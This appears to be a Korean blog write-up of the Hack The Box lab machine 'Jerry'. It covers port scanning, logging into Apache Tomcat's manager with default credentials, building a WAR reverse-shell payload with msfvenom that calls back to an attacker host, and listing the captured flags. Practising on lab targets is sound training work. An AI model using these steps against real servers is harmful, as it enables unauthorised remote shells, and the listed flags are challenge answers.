Wargame/Hack The Box

[HTB] Jerry Writeup

Vardy 2022. 1. 22. 21:32

공격 대상에 대한 정보를 획득하기 위해 포트스캐닝을 수행해보자.

nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.1.110

 

유일하게 열려있는 8080 포트에 접근해보니, Apache Tomcat 디폴트 페이지가 나왔다.

관리자 페이지의 디폴트 주소인 /manager 에 접근해보니 계정 정보를 요구했다.

기본 관리자 계정 정보인 admin / admin  으로 로그인 하니, 아래와 같은 페이지가 나타났고, manager-gui의 계정 정보를 확인 할 수 있었다. ( tomcat / s3cret ) 

다시 로그인 하면 아래와같은 gui 관리자 페이지가 나타난다.

관리자는 war 파일을 통해 업로드를 할 수 있으므로, war형식의 리버스 쉘 파일을 생성했다.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.80 LPORT=1234 -f war -o reverseShell.war

업로드 후 생성된 파일을 클릭해주면 시스템 권한의 리버스 쉘을 획득 할 수 있다.

FLAG = 

[user] 7004dbcef0f854e0fb401875f26ebd00

[root] 04a8b36e1545a455393d067e772fe90e

 

반응형